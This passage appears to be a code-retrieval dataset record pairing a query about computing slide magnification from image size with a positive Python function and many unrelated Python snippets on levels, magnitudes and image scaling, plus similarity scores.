return 0 if level==\"easy\" else (1 if level==\"medium\" else 2)", "def getMeasure(unique_name):", "def getMeasure(unique_name):", "def lphot(self):\n return self._get_mean_and_samples_attribute('lphot')", "def lookup_median(lender, metro):\n if lender:\n lender_str = lender.institution_id\n if metro:\n stat = LendingStats.objects.filter(\n institution_id=lender_str, geo_id=metro.geoid).first()\n if stat:\n return stat.lar_median\n return calculate_median_loans(lender_str, metro)", "def __get_maidenhead(self, level):\n \n mh_resp = {'grid': None, 'lock': False}\n loc = self.__get_gps_location()\n\n if loc['lock']:\n mh_resp['lock'] = True\n mh_resp['grid'] = mh.to_maiden(loc['lat'], loc['lon'], precision=level)\n\n return mh_resp", "def get_level(tag: str) -> int:\n return TAG_LEVELS[tag]", "def level(self):\n return self.__pin.pwm", "def lookup_clutter_geotype(geotype_lookup, population_density):\n\n highest_popd, highest_geotype = geotype_lookup[0]\n middle_popd, middle_geotype = geotype_lookup[1]\n lowest_popd, lowest_geotype = geotype_lookup[2]\n\n if population_density < middle_popd:\n return lowest_geotype\n\n elif population_density > highest_popd:\n return highest_geotype\n\n else:\n return middle_geotype", "def get_info(self, level):\n\n # see if we can open the tile info file.\n info_file = os.path.join(self.tile_dir, '%02d' % level,\n self.TileInfoFilename)\n try:\n fd = open(info_file, 'rb')\n except IOError:\n return None\n\n # OK, looks like we actually do have this level!\n info = pickle.load(fd)\n fd.close()\n\n return info", "def get_no_strat_levels(no_vert_levels_atmos):\n try:\n if float(no_vert_levels_atmos) > 60:\n no_strat_levels = '20'\n else:\n no_strat_levels = '10'\n except:\n no_strat_levels = '10'\n\n return no_strat_levels", "def _do_get_level(self):\n logging.info(__name__ + ' : Read level of channel 1')\n result = self._execute('R1')\n return float(result.replace(\"R\", \"\")) / 10", "def level(self):\n return self.init_v[2]", "def read_level(self):\n current_level = 1\n\n try:\n if self.store.exists(LEVEL_STORE):\n current_level_str = self.store.get(LEVEL_STORE)['level']\n current_level = int(current_level_str)\n except:\n print 'Exception when reading Galaxy run level from JSON file!'\n current_level = 1\n\n return current_level", "def level(self):\n return self.game_data['player stats']['Level']", "def map_roi_levels(self, rois, num_levels):\r\n scale = torch.sqrt(\r\n (rois[:, 3] - rois[:, 1] + 1) * (rois[:, 4] - rois[:, 2] + 1))\r\n target_lvls = torch.floor(torch.log2(scale / self.finest_scale + 1e-6))\r\n target_lvls = target_lvls.clamp(min=0, max=num_levels - 1).long()\r\n return target_lvls", "def _get_normal_map_scale_subfolder(self):\n if self.im_scale <= 0.25:\n if self.im_scale <= 0.125:\n return \"Normals/0.125/\"\n else:\n return \"Normals/0.25/\"\n else: \n return \"Normals/\"", "def get_luminosity(self, vel_disp):\n\t\tlog_L_V = self.slope*np.log10(vel_disp) + self.intercept\n\t\treturn log_L_V", "def normalize_zoomlvl(lvl):\n if lvl < gMinZoomLevel:\n return gMinZoomLevel\n elif lvl > gMaxZoomLevel:\n return gMaxZoomLevel\n else:\n return lvl - gMinZoomLevel", "def mag_err(self):\n return self.photosamplers.get_estimate(mag=True)[1:]", "def get_estimate(self, mag=False):\n if mag is False:\n return super(PhotoSamplers,self).get_estimate()\n \n return self._magsamples.get_estimate()", "def mab0(self):\n return GALEX_INFO[self.bandname][\"ABmag0\"]", "def get_tile_at_position(level, position):\n size = level_size(level)\n index = position_to_index(position, size)\n return level[index]", "def getCorona(self):\n return self.corona_level", "def get_level(text):\n m = re.search(LEVEL_PATTERN, text)\n if m:\n level = m.groups(0)[0]\n return level\n return UNKNOWN", "def getLevel(self, *args):\n return _libsbml.QualExtension_getLevel(self, *args)", "def getMaxLevel(self):\n return _libsbml.QualitativeSpecies_getMaxLevel(self)", "def get_number_of_atmos_levels(description):\n if description == \"none\":\n return \"0\", \"0\"\n elif re.search(\"levels\", description):\n match = re.search(\"(?P<nl>\\d+)\\s?(levels|vertical levels)\", description)\n nlevs = match.groupdict()[\"nl\"]\n if int(nlevs) > 49: nlas = \"20\"\n else: nlas = \"10\"\n return nlevs, nlas\n else:\n return \"40\", \"20\"", "def resolution(self):\n\t\tif self.name.endswith( '_LOW' ):\n\t\t\treturn 'LOW'\n\t\telif self.name.endswith( '_MID' ):\n\t\t\treturn 'MID'\n\t\telse:\n\t\t\treturn 'HIGH'", "def getLevel(self, channel, group=\"I\", stage=\"I\", unitCode=0):\n self.send(XAP800_CMD + str(unitCode) + \" LVL \" + str(channel) + \" \" +\n group + \" \" + stage + \" \" + EOM)\n return float(self.readResponse())", "def get_levelID(self):\n return self.levelID", "def getLevel(self, *args):\n return _libsbml.MultiExtension_getLevel(self, *args)", "def get_modifier(path, lfdb):\n (cam, lens) = get_cam_lens(path, lfdb)\n (width, height) = map(int, get_exif(path, 'ImageSize').split('x'))\n return lensfunpy.Modifier(lens, cam.crop_factor, width, height)", "def getType(level):\n randomId = random.randint(1, WEIGHT[level])\n return getByWeight(POSSIBLE_TYPES[level], randomId)[0]", "def get_hero_level(self, uuid, hero):\n\n return self.template(uuid, \"lastLevel_\" + hero)", "def luminosity(r,T,autoDebug=True):\n\t#-----------BEGIN ERROR CHECKING----------\n\tif autoDebug:\n\t\tsam.type_check(r, sam.TYPES_math, \"r\")\n\t\tsam.type_check(T, sam.TYPES_math, \"T\")\n\t\tsam.value_check(r,.0,\">\",\"r\")\n\t\tsam.value_check(T,.0,\">\",\"T\")\n\t#-----------END ERROR CHECKING----------\n\n\tL = 4 * sam.CONSTANT_pi * r**2 * sam.CONSTANT_SB* T**4\n\treturn L", "def _get_med(self):\n return self.__med", "def use_level(self, level):\n\n if self.min_level <= level <= self.max_level:\n map_extent = self.tiles.use_level(level)\n if map_extent:\n self.level = level\n (self.map_width, self.map_height,\n self.ppd_x, self.ppd_y) = map_extent\n (self.map_llon, self.map_rlon,\n self.map_blat, self.map_tlat) = self.tiles.extent\n\n # do level change callback\n self.handleLevelChangeCallback(level)\n\n return True\n\n return False", "def weaponValue(self, level):\n if level == 1:\n bonus = 2\n elif level == 2:\n bonus = 4\n elif level == 3:\n bonus = 6\n elif level == 4:\n bonus = 8\n else:\n bonus = 0\n\n return bonus", "def getSupportResistanceLevels(self):\n return self.levels", "def get_mlt_phys(sed_name):\n\n new_name = sed_name.replace('+','-').replace('a','-').split('-')\n\n logg_sgn_dex = len(new_name[0])\n\n if sed_name[logg_sgn_dex] == '-':\n logg_sgn = 1.0\n elif sed_name[logg_sgn_dex] == '+':\n logg_sgn = -1.0\n else:\n raise RuntimeError('Cannot get logg_sgn for %s' % sed_name)\n\n metallicity_sgn_dex = len(new_name[0]) + len(new_name[1]) + 1\n\n if sed_name[metallicity_sgn_dex] == '-':\n metallicity_sgn = -1.0\n elif sed_name[metallicity_sgn_dex] == '+':\n metallicity_sgn = 1.0\n else:\n raise RuntimeError('Cannot get metallicity_sgn for %s' % sed_name)\n\n teff = 100.0*float(new_name[0][3:])\n metallicity = metallicity_sgn*float(new_name[2])\n logg = logg_sgn*float(new_name[1])\n\n return teff, metallicity, logg", "def get_level(command):\n if is_delete(command):\n return None\n elif is_get(command):\n return int(command.split(\" \")[2])\n elif is_insert(command) or is_update(command):\n return int(command.split(\" \")[3])", "def get_min_max(self, run_id):\n runs = self.repo.get_all_runs()\n levels = runs[['min_level', 'max_level']][runs['run_id'] == run_id]\n return levels", "def get_luminosities(self, annulus_ident: int, model: str, lo_en: Quantity = None, hi_en: Quantity = None) \\\n -> Union[Quantity, Dict[str, Quantity]]:\n # Checking the input energy limits are valid, and assembles the key to look for lums in those energy\n # bounds. If the limits are none then so is the energy key\n if all([lo_en is not None, hi_en is not None]) and lo_en > hi_en:\n raise ValueError(\"The low energy limit cannot be greater than the high energy limit\")\n elif all([lo_en is not None, hi_en is not None]):\n en_key = \"bound_{l}-{u}\".format(l=lo_en.to(\"keV\").value, u=hi_en.to(\"keV\").value)\n else:\n en_key = None\n\n # Checks that the requested region, model and energy band actually exist\n if len(self._luminosities[annulus_ident]) == 0:\n raise ModelNotAssociatedError(\"There are no XSPEC fits associated with this AnnularSpectra\")\n elif model not in self._luminosities[annulus_ident]:\n av_mods = \", \".join(self._luminosities[annulus_ident].keys())\n raise ModelNotAssociatedError(\"{m} has not been fitted to this AnnularSpectra; \"\n \"available models are {a}\".format(m=model, a=av_mods))\n elif en_key is not None and en_key not in self._luminosities[annulus_ident][model]:\n av_bands = \", \".join([en.split(\"_\")[-1] + \"keV\" for en in self._luminosities[annulus_ident][model].keys()])\n raise ParameterNotAssociatedError(\"A luminosity within {l}-{u}keV was not measured for the fit \"\n \"with {m}; available energy bands are \"\n \"{b}\".format(l=lo_en.to(\"keV\").value, u=hi_en.to(\"keV\").value, m=model,\n b=av_bands))\n\n # If no limits specified,the user gets all the luminosities, otherwise they get the one they asked for\n if en_key is None:\n parsed_lums = {}\n for lum_key in self._luminosities[annulus_ident][model]:\n lum_value = self._luminosities[annulus_ident][model][lum_key]\n parsed_lum = Quantity([lum.value for lum in lum_value], lum_value[0].unit)\n parsed_lums[lum_key] = parsed_lum\n return parsed_lums\n else:\n lum_value = self._luminosities[annulus_ident][model][en_key]\n parsed_lum = Quantity([lum.value for lum in lum_value], lum_value[0].unit)\n return parsed_lum", "def QualExtension_getDefaultLevel():\n return _libsbml.QualExtension_getDefaultLevel()", "def getLevel(self):\n return self._level", "def load_level(level):\n\n global spawn_boxes\n\n level = pytmx.load_pygame('maps/level_' + level + '.tmx')\n\n y_num = 0\n for x, y, gid in level.get_layer_by_name('Objects'):\n if level.get_tile_image_by_gid(gid) != None:\n matrix[y_num].append(1)\n else:\n matrix[y_num].append(0)\n \n if x == 19: y_num += 1\n\n spawn_boxes = [] # Areas in which enemies can spawn. Requires tiled type 'spawn_box'\n for obj in level.get_layer_by_name('Triggers'):\n if obj.type == 'spawn_box':\n rect = pygame.rect.Rect(obj.x, obj.y, obj.width, obj.height)\n if obj.name == 'north': \n rect = rect.move(0, -64)\n rect.height += 64\n if obj.name == 'east': \n rect = rect.move(64, 0)\n rect.width += 64\n if obj.name == 'south': \n rect = rect.move(0, 64)\n rect.height += 64\n if obj.name == 'west': \n rect = rect.move(-64, 0)\n rect.width += 64\n spawn_boxes.append(rect)\n\n return level", "def getLightSensor() -> int:\n pass", "def get_size_for_mag(slide, mag):\n max_size = slide.dimensions\n max_mag = highest_mag(slide)\n downsample = max_mag/mag\n return [np.int(np.round(dim/downsample)) for dim in max_size]", "def galaxy(img):\n return img[420:490, 710:770]", "def sazelmag(source):\n if 1:\n # bizarre failures in s.azel() showing up on Mar 11, 2006....\n try:\n Azel = subarrayControl.s.azel(source, 0.0);\n except Exception, e:\n print \"Problem with s.azel(%s): %s\" %(source,e)\n return (source, 0, -10, 0)\n try:\n mag = subarrayControl.s.queryMag(source)\n except Exception, e:\n print \"Problem with queryMag(%s): %s\" %(source,e) \n return (source, 0, -10, 0)\n return ( source, Azel[0], Azel[1], mag)\n else:\n cmd = 'checksource source=%s comments=t sexa=f' % source\n # the 2nd (last) line contains all the info\n r=os.popen(cmd).readlines()[1].strip()\n rs=r.split()\n re=r.split('=')\n if len(re) == 2:\n mag=float(re[1])\n else:\n mag=-9.99\n return ( source, float(rs[3]), float(rs[4]), mag)", "def get_min_mag_edge(self):\r\n\t\treturn self.min_mag", "def getMagBoundary(self):\n\n # Get the boundary of magnitude based on the filter\n lowMagnitude = nan\n highMagnitude = nan\n if (self.filter == self.FilterU):\n lowMagnitude = 7.94\n highMagnitude = 14.80\n\n elif (self.filter == self.FilterG):\n lowMagnitude = 9.74\n highMagnitude = 16.17\n\n elif (self.filter == self.FilterR):\n lowMagnitude = 9.56\n highMagnitude = 15.73\n\n elif (self.filter == self.FilterI):\n lowMagnitude = 9.22\n highMagnitude = 15.26\n\n elif (self.filter == self.FilterZ):\n lowMagnitude = 8.83\n highMagnitude = 14.68\n \n elif (self.filter == self.FilterY):\n lowMagnitude = 8.02\n highMagnitude = 13.76\n\n return lowMagnitude, highMagnitude", "def get_level(k):\r\n return int(log2(k))", "async def _fetch_level_info(self) -> Level:\n \n memory = await self._read_memory()\n\n level_name = memory.get_level_name()\n level_creator = memory.get_level_creator()\n level_id = memory.get_level_id()\n\n level = Level(id=level_id, name=level_name,\n creator = level_creator)\n\n level.practice_mode = memory.is_practice_mode()\n\n level.attempts = memory.get_attempts()\n level.jumps = memory.get_jumps()\n level.difficulty = memory.get_level_difficulty()\n\n level.percent = math.floor(memory.get_percent())\n level.best_percent = math.floor(memory.get_normal_percent())\n\n level.practice_best = math.floor(memory.get_practice_percent())\n\n level.rating = memory.get_level_stars()\n level.featured = memory.is_level_featured()\n level.epic = memory.is_level_epic()\n\n return level", "def get_damage():\n\n return character['Damage']" ]
[ "0.76260245", "0.6262649", "0.62293607", "0.61587805", "0.60415137", "0.6033318", "0.58130866", "0.5732402", "0.57084596", "0.5647901", "0.5613819", "0.5604842", "0.5599045", "0.55820286", "0.5574072", "0.5559694", "0.55576396", "0.555535", "0.55302167", "0.5511368", "0.5494198", "0.54852396", "0.5452814", "0.54244727", "0.54218197", "0.5421613", "0.5416685", "0.54048425", "0.53021735", "0.52995604", "0.5284117", "0.5283781", "0.5277727", "0.52573913", "0.5250036", "0.52265453", "0.5196042", "0.51912636", "0.5171809", "0.51687026", "0.51603323", "0.5159297", "0.51288354", "0.5126065", "0.5124125", "0.5115915", "0.5115915", "0.5115366", "0.51039505", "0.5103442", "0.509526", "0.5091162", "0.50762963", "0.50423807", "0.50376505", "0.5027888", "0.5025514", "0.50210255", "0.50137115", "0.50037116", "0.49907872", "0.498121", "0.49792895", "0.49770924", "0.49746302", "0.49734712", "0.49700868", "0.49643868", "0.4958834", "0.49439278", "0.4940448", "0.49346963", "0.4932495", "0.49321303", "0.4929391", "0.49166372", "0.49131876", "0.49128357", "0.4912683", "0.49106142", "0.48932758", "0.48867613", "0.48858136", "0.48854262", "0.48837626", "0.48835748", "0.4878468", "0.48673624", "0.48672682", "0.48633555", "0.4849789", "0.48423553", "0.48389417", "0.48273817", "0.4826139", "0.48121336", "0.480901", "0.48081067", "0.48062953", "0.48022556" ]
0.7825988
0
Get the magnification corresponding to an image size at the highest magnification
def get_mag_for_size(slide, size): max_size = slide.dimensions max_mag = highest_mag(slide) downsample = np.average([max_dim/size_dim for max_dim, size_dim in zip(max_size, size)]) return max_mag/downsample
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def mag(self):\n return self.photosamplers.get_estimate(mag=True)[0]", "def highest_mag(slide):\n return int(slide.properties['aperio.AppMag'])", "def get_size_for_mag(slide, mag):\n max_size = slide.dimensions\n max_mag = highest_mag(slide)\n downsample = max_mag/mag\n return [np.int(np.round(dim/downsample)) for dim in max_size]", "def get_thumbnail_magnification(slide):\n ratio = np.asarray(slide.dimensions) / np.asarray(slide.associated_images[\"thumbnail\"].size)\n # np.sqrt(np.prod(ratio))\n return ratio", "def getNativeMagnification(self):\n pixelInfo = self._tiffDirectories[-1].pixelInfo\n mm_x = pixelInfo.get('mm_x')\n mm_y = pixelInfo.get('mm_y')\n # Estimate the magnification if we don't have a direct value\n mag = pixelInfo.get('magnification') or 0.01 / mm_x if mm_x else None\n return {\n 'magnification': mag,\n 'mm_x': mm_x,\n 'mm_y': mm_y,\n }", "def _select_largest_photo(self, sizes):\n\n max_size = 0\n photo = ''\n for size in sizes:\n w = size['width']\n h = size['height']\n if w * h >= max_size:\n max_size = w * h\n photo = size['url']\n return photo", "def getZoomFactor(imageSize, maxW, maxH):\n\timageW, imageH = imageSize\n\tzoomW = float(imageW) / float(maxW)\n\tzoomH = float(imageH) / float(maxH)\n\treturn max(zoomW, zoomH)", "def get_mag(self):\n raise NotImplementedError", "def findMax(img):\n\td = minMaxLoc(img)\n\treturn {\"maxVal\":d[\"maxVal\"], \"maxLoc\":d[\"maxLoc\"]}", "def max_scale_image(self):\n maximum = np.argmax(self.transform, 0)\n return self.scale_array[maximum] * (self.support.sum(0) > 0)", "def get_min_mag_center(self):\r\n\t\treturn self.min_mag + self.bin_width / 2", "def mag(self) -> complex:\n return self.major_extent", "def _image_resolution(image_filename):\n img = mpimg.imread(image_filename)\n return img.shape", "def getNativeMagnification(self):\n return self._nativeMagnification.copy()", "def get_image_size(self):", "def _calculate_magnification(self, times):\n if self._model.n_lenses == 2:\n factor = 10.\n params = self._model.parameters\n t_1 = params.t_0 - factor * params.t_E\n t_2 = params.t_0 + factor * params.t_E\n self._model.set_magnification_methods([t_1, 'VBBL', t_2])\n self._model.set_default_magnification_method(\n 'point_source_point_lens')\n\n magnification = self._model.magnification(times)\n return magnification", "def get_resize_to(image, size_x, size_y):\n scale_x = image.shape[0] // size_x\n scale_y = image.shape[1] // size_y\n if scale_x == 0 or scale_y == 0:\n return 3, None\n if image.shape[0] % scale_x != 0 or image.shape[1] % scale_y != 0:\n return 1, None\n if image.shape[0] < scale_x or image.shape[1] < scale_y:\n return 2, None\n\n arrays = []\n for i in range(scale_x):\n for j in range(scale_y):\n arrays.append(image[i::scale_x, j::scale_y])\n\n result = mode(np.stack(arrays), axis=0).mode[0]\n if result.max() > 10:\n print(1)\n\n return 0, result", "def find_max(subimage):\r\n\tmax_val_subimage = np.nanmax(subimage)\r\n\treturn max_val_subimage", "def _get_extended_image_size(height, width, patch_size, stride):\n\n ext_height, ext_width = 0, 0\n\n def sliding_distance(n_windows, window_size, stride):\n return window_size * n_windows - (window_size - stride) * (n_windows - 1)\n\n if height < patch_size:\n ext_height = patch_size\n else:\n for n in range(height):\n distance = sliding_distance(n, patch_size, stride)\n if distance > height:\n ext_height = distance\n break\n\n if width < patch_size:\n ext_width = patch_size\n else:\n for n in range(width):\n distance = sliding_distance(n, patch_size, stride)\n if distance > width:\n ext_width = distance\n break\n\n return ext_height, ext_width", "def level_mags(slide):\n return [highest_mag(slide)/downsample for downsample in slide.level_downsamples]", "def getMagnification(self, pixelSize=0.0129, isFilter=False, erodeIter=None):\r\n\r\n if not hasattr(self, 'determinantMap'):\r\n _ = self._getDeterminantMap()\r\n\r\n if hasattr(self, 'finalPathesMarked'):\r\n finalPatches = self.finalPatchesMarked\r\n elif hasattr(self, 'finalPatches'):\r\n finalPatches = self.finalPatches\r\n else:\r\n self.processTrial()\r\n finalPatches = self.finalPatches\r\n\r\n magMap = 1 / self.determinantMap\r\n\r\n if isFilter:\r\n magMap = ni.filters.gaussian_filter(magMap, self.params['signMapFilterSigma'])\r\n\r\n # get mean power amplitude for all visual areas normalized by V1\r\n magDict = {}\r\n for key, patch in finalPatches.items():\r\n array = patch.array.astype(np.float)\r\n\r\n if erodeIter:\r\n array = ni.binary_erosion(array, iterations=erodeIter)\r\n\r\n area = np.sum(array)\r\n\r\n totalMag = np.sum(array * magMap)\r\n\r\n magDict.update({key: (pixelSize ** 2) * totalMag / area})\r\n\r\n return magDict", "def image_size(size):\n l_max = max(size)\n if l_max > 300:\n num = l_max/300\n else:\n num = 1\n w = round(size[0] / num)\n h = round(size[1] / num)\n new_size = [w, h]\n return new_size", "def _get_target_scale(self, im_size_min, im_size_max, target_size, max_size):\n im_scale = float(target_size) / float(im_size_min)\n # Prevent the biggest axis from being more than max_size\n if np.round(im_scale * im_size_max) > max_size:\n im_scale = float(max_size) / float(im_size_max)\n return im_scale", "def rscale(mag=10.0):\n if mag > 11.5:\n return 0.5\n elif mag > 11.0:\n return 1.0\n elif mag > 10.5:\n return 1.5\n elif mag > 10.0:\n return 1.5\n elif mag > 9.5:\n return 2.0\n elif mag > 9.0:\n return 2.5\n elif mag > 8.5:\n return 3.0\n else:\n return 3.5", "def getImageMax(self):\n fname = '%s::%s'%(self.__class__.__name__, self.getImageMax.__name__)\n if (not self.lhaveImage):\n print(\"%s: DSM image not yet computed\"%fname)\n return None, None\n maxIndex = c_int(1)\n maxValue = c_float(1)\n ierr = c_int(1)\n self.lib.xcloc_getImageMax(maxIndex, maxValue, ierr)\n if (ierr.value != 0):\n print(\"%s: Failed to get max value and index of DSM image\"%fname)\n return None, None\n imax = maxIndex.value - 1 # Fortran to C\n vmax = maxValue.value\n return imax, vmax", "def mag(self) -> float:\n return sqrt(self.sqr_mag())", "def CalculateMaxImageSize(self, partition_size):\n raise NotImplementedError", "def get_maxdist(self, pixel_size):\n\n total_area = self.minnpix_cluster*pixel_size**2.\n\n radius = ((np.sqrt(total_area)/2.))\n if radius > 1.0:\n radius = int(radius)\n else:\n radius = round_to_1(radius)\n dist = np.sqrt(2.*float(radius)**2.)\n dist = dist+(0.05*dist)\n\n return dist", "def scaled_image(width, height):\r\n total = width*height\r\n scale_dict = {0.2: 6500000, 0.3: 4000000, 0.4: 2250000, 0.5: 1000000, 0.8: 500000, 1: 0}\r\n for k, v in scale_dict.items():\r\n if total > v:\r\n return k", "def get_largest_two_component(img, print_info = False, threshold = None):\n s = ndimage.generate_binary_structure(3,2) # iterate structure\n labeled_array, numpatches = ndimage.label(img,s) # labeling\n sizes = ndimage.sum(img,labeled_array,range(1,numpatches+1)) \n sizes_list = [sizes[i] for i in range(len(sizes))]\n sizes_list.sort()\n if(print_info):\n print('component size', sizes_list)\n if(len(sizes) == 1):\n out_img = img\n else:\n if(threshold):\n out_img = np.zeros_like(img)\n for temp_size in sizes_list:\n if(temp_size > threshold):\n temp_lab = np.where(sizes == temp_size)[0] + 1\n temp_cmp = labeled_array == temp_lab\n out_img = (out_img + temp_cmp) > 0\n return out_img\n else: \n max_size1 = sizes_list[-1]\n max_size2 = sizes_list[-2]\n max_label1 = np.where(sizes == max_size1)[0] + 1\n max_label2 = np.where(sizes == max_size2)[0] + 1\n component1 = labeled_array == max_label1\n component2 = labeled_array == max_label2\n if(max_size2*10 > max_size1):\n component1 = (component1 + component2) > 0\n out_img = component1\n return out_img", "def get_largest_two_component(img, print_info = False, threshold = None):\n s = ndimage.generate_binary_structure(3,2) # iterate structure\n labeled_array, numpatches = ndimage.label(img,s) # labeling\n sizes = ndimage.sum(img,labeled_array,range(1,numpatches+1)) \n sizes_list = [sizes[i] for i in range(len(sizes))]\n sizes_list.sort()\n if(print_info):\n print('component size', sizes_list)\n if(len(sizes) == 1):\n out_img = img\n else:\n if(threshold):\n out_img = np.zeros_like(img)\n for temp_size in sizes_list:\n if(temp_size > threshold):\n temp_lab = np.where(sizes == temp_size)[0] + 1\n temp_cmp = labeled_array == temp_lab\n out_img = (out_img + temp_cmp) > 0\n return out_img\n else: \n max_size1 = sizes_list[-1]\n max_size2 = sizes_list[-2]\n max_label1 = np.where(sizes == max_size1)[0] + 1\n max_label2 = np.where(sizes == max_size2)[0] + 1\n component1 = labeled_array == max_label1\n component2 = labeled_array == max_label2\n if(max_size2*10 > max_size1):\n component1 = (component1 + component2) > 0\n out_img = component1\n return out_img", "def get_size(self, index):\n return self.image_sizes[index]", "def get_min_mag_edge(self):\r\n\t\treturn self.min_mag", "def find_brightest_biggest(filename, catname=\"sources.cat\", config=\"config.sex\", minsize=10,\n minflux=450000):\n # Get dimensions of the image\n hdulist = pf.open(filename)\n (height, width) = hdulist[0].data.shape\n bloblist = manual_blob_finder(hdulist[0].data)\n hdulist.close()\n\n if bloblist is None:\n return None\n\n sort_ind = np.argsort(bloblist['max'])[::-1]\n blob_ind = None\n for ind in sort_ind:\n if bloblist['width'][ind] >= minsize and bloblist['flux'][ind] > minflux:\n blob_ind = ind\n break\n\n if blob_ind is None:\n return None\n\n return (bloblist['cent_x'][blob_ind] - (float(width) / 2.),\n bloblist['cent_y'][blob_ind] - (float(height) / 2.),\n bloblist['flux'][blob_ind],\n bloblist['width'][blob_ind],\n bloblist['max'][blob_ind])\n\n '''\n # Use sextractor to find blobs.\n # N.B. may be tuning of parameters, but this was mostly unreliable and noisy.\n\n hdulist.close()\n\n # Source extract\n call([\"sextractor\", filename, \"-c\", config, \"-CATALOG_NAME\", catname])\n\n # Load the catalog file\n srclist = pf.open(catname)\n srctable = srclist[2].data\n sort_ind = np.argsort(srctable['FLUX_MAX'])[::-1]\n blob_ind = None\n for ind in sort_ind:\n if (srctable['FLUX_RADIUS'][ind] > minsize and srctable['FLUX_MAX'][ind] > minflux and\n srctable['FLUX_RADIUS'][ind] < maxradius and srctable['FLUX_MAX'][ind] < maxflux):\n blob_ind = ind;\n break\n if blob_ind is None:\n return None\n return (srctable['X_IMAGE'][blob_ind] - (float(width) / 2.), \n srctable['Y_IMAGE'][blob_ind] - (float(height) / 2.),\n srctable['FLUX_MAX'][blob_ind],\n srctable['FLUX_RADIUS'][blob_ind],\n srctable['SNR_WIN'][blob_ind])\n '''", "def largestResolution(resolutions):\n return resolutions[0]", "def getMaxMancount(self):\n return self.__size * 20", "def calc_image_size(spr):\n return int(max(spr.label_safe_width(), 1)), \\\n int(max(spr.label_safe_height(), 1))", "def get_height():\n return resize.transforms[1].size", "def peak_height(self):\n return np.array([max(self.waveform[ch]) for ch in range(self.nchannels)])", "def img_scale(self):\n return min(400, abs(self.size))", "def getScaledDimensions(size, max_size, returnFactor=False):\n\n width, height = size\n max_width, max_height = max_size\n if (max_width, max_height) == (0, 0) or (width, height) == (0, 0): return (0, 0)\n wfactor, hfactor = 1.0, 1.0\n\n if width > max_width: wfactor = float(max_width) / width\n if height > max_height: hfactor = float(max_height) / height\n\n factor = min(wfactor, hfactor)\n\n size = (width * factor, height * factor)\n\n if not returnFactor:\n return size\n else:\n return size, factor", "def mag_err(self):\n return self.photosamplers.get_estimate(mag=True)[1:]", "def large_image(self) -> Optional[str]:\n return pulumi.get(self, \"large_image\")", "def max_obj_dets_per_img(self):\n return min(64, self._annos_per_img[self.dataset]['max_objects'])", "def get_max_rois(self):\n \n maxsize = 0\n for index in self.SampleID:\n rois = self.__getrois__(index);\n maxsize = max(maxsize, rois.shape[0])\n \n return maxsize", "def get_image_size(frame) -> tuple:\n return tuple(frame.shape[1::-1])", "def max_zoom(self) -> float:\n return math.log(np.min(self.canvas_size) / REGION_DIM)", "def _get_max_estimated_bandit(self)->Bandit:\n # print(\"mus - \", self.mu)\n # print(\"actions - \", np.argmax(self.mu))\n unique, counts = np.unique(self.mu, return_counts=True)\n lens = counts[np.argmax(unique)] \n if lens>1: # if two actions have same argmax\n # then return arbitrarily from those max ones\n maxs = list(np.array(self.bandits)[self.mu==unique[np.argmax(unique)]])\n return np.random.choice(maxs)\n # otherwise return the max one\n return self.bandits[np.argmax(self.mu)]", "def sort_maxside(sprite):\n return max(sprite.width, sprite.height)", "def get_size(img):\n ih, iw = img.shape[:2]\n return iw * ih", "def get_height_of_signal_maximum(\n data, setup={}, varname=None, gate_min=None, gate_max=None):\n idx = get_index_of_signal_maximum(\n data, setup, varname, gate_min, gate_max)\n nt = range(len(idx))\n return data['alt'][nt, idx]", "def get_large_from_thumbnail(url):\n a = annotate(url)\n if not a:\n return\n r = return_large(a)\n\n # If there are no large equivalents, return None\n if not r:\n return None\n return r", "def find_maximum_patch_size(model, device):\n logger = get_logger('PatchFinder')\n in_channels = model.in_channels\n\n patch_shapes = [(64, 128, 128), (96, 128, 128),\n (64, 160, 160), (96, 160, 160),\n (64, 192, 192), (96, 192, 192)]\n\n for shape in patch_shapes:\n # generate random patch of a given size\n patch = np.random.randn(*shape).astype('float32')\n\n patch = torch \\\n .from_numpy(patch) \\\n .view((1, in_channels) + patch.shape) \\\n .to(device)\n\n logger.info(\"Current patch size: {shape}\")\n model(patch)", "def get_max_density(self):\n max_density = str(self.density.index(min(self.density)) + 1)\n print(max_density)\n return max_density", "def get_level_mag(slide, level):\n return level_mags(slide)[level]", "def calculate_max_height_width(imgs):\n h_w_map = np.zeros((len(imgs), 2), dtype=np.int32)\n for index, img in enumerate(imgs):\n h_w_map[index, 0], h_w_map[index, 1], _ = img.shape\n max_val = h_w_map.argmax(axis=0)\n max_height, max_width = h_w_map[max_val[0], 0], h_w_map[max_val[1], 1]\n return max_height, max_width", "def GetSizeGreatestPrimeFactor(self) -> \"unsigned long long\":\n return _itkHalfHermitianToRealInverseFFTImageFilterPython.itkHalfHermitianToRealInverseFFTImageFilterICF2IF2_GetSizeGreatestPrimeFactor(self)", "def find_maximum_patch_size(model, device):\n logger = get_logger('PatchFinder')\n in_channels = model.in_channels\n\n patch_shapes = [(64, 128, 128), (96, 128, 128),\n (64, 160, 160), (96, 160, 160),\n (64, 192, 192), (96, 192, 192)]\n\n for shape in patch_shapes:\n # generate random patch of a given size\n patch = np.random.randn(*shape).astype('float32')\n\n patch = torch \\\n .from_numpy(patch) \\\n .view((1, in_channels) + patch.shape) \\\n .to(device)\n\n logger.info(f\"Current patch size: {shape}\")\n model(patch)", "def image_size():\n return eval(subprocess(\"print camera_image_size()\"))", "def stdsize(image,r=30):\n image = square(image)\n s,_ = image.shape\n return interpolation.zoom(image,(r+0.5)/float(s))", "def get_max_imgid(cursor: db.Cursor, table: str) -> int:\r\n res = cursor.execute(f\"SELECT MAX({cng.BBOX_DB_IMGRNR}) FROM {table}\")\r\n maxid: int = res.fetchall()[0][0]\r\n\r\n if maxid is None:\r\n return -1\r\n else:\r\n return maxid", "def mag(q):\n magnitude = np.sqrt((q[0,0]**2)+(q[0,1]**2)+(q[0,2]**2)+(q[0,3]**2))\n return magnitude", "def calc_mag(self):\n mag = np.sum(self.box)\n return mag", "def pixel_size_ratio(self):\n return 2**(self.levels[-1] - self.levels[0])", "def calc_thumbnail_size(img):\n width, length = img.size\n ratio = width / length\n\n # for some reason, if it's exactly 224, then thumnailed image is 223\n dim = 224 + 1 # output dim\n if ratio > 1:\n size = (dim * ratio, dim)\n else:\n size = (dim, dim / ratio)\n# print(size)\n return size", "def maxfit(self, *args, **kwargs):\n return _image.image_maxfit(self, *args, **kwargs)", "def get_level_for_mag(slide, mag):\n level_mags_rounded = list(np.round(level_mags(slide), decimals = 2))\n if mag in level_mags_rounded:\n return level_mags_rounded.index(mag)\n else: \n return None", "def quickMinMax(self, 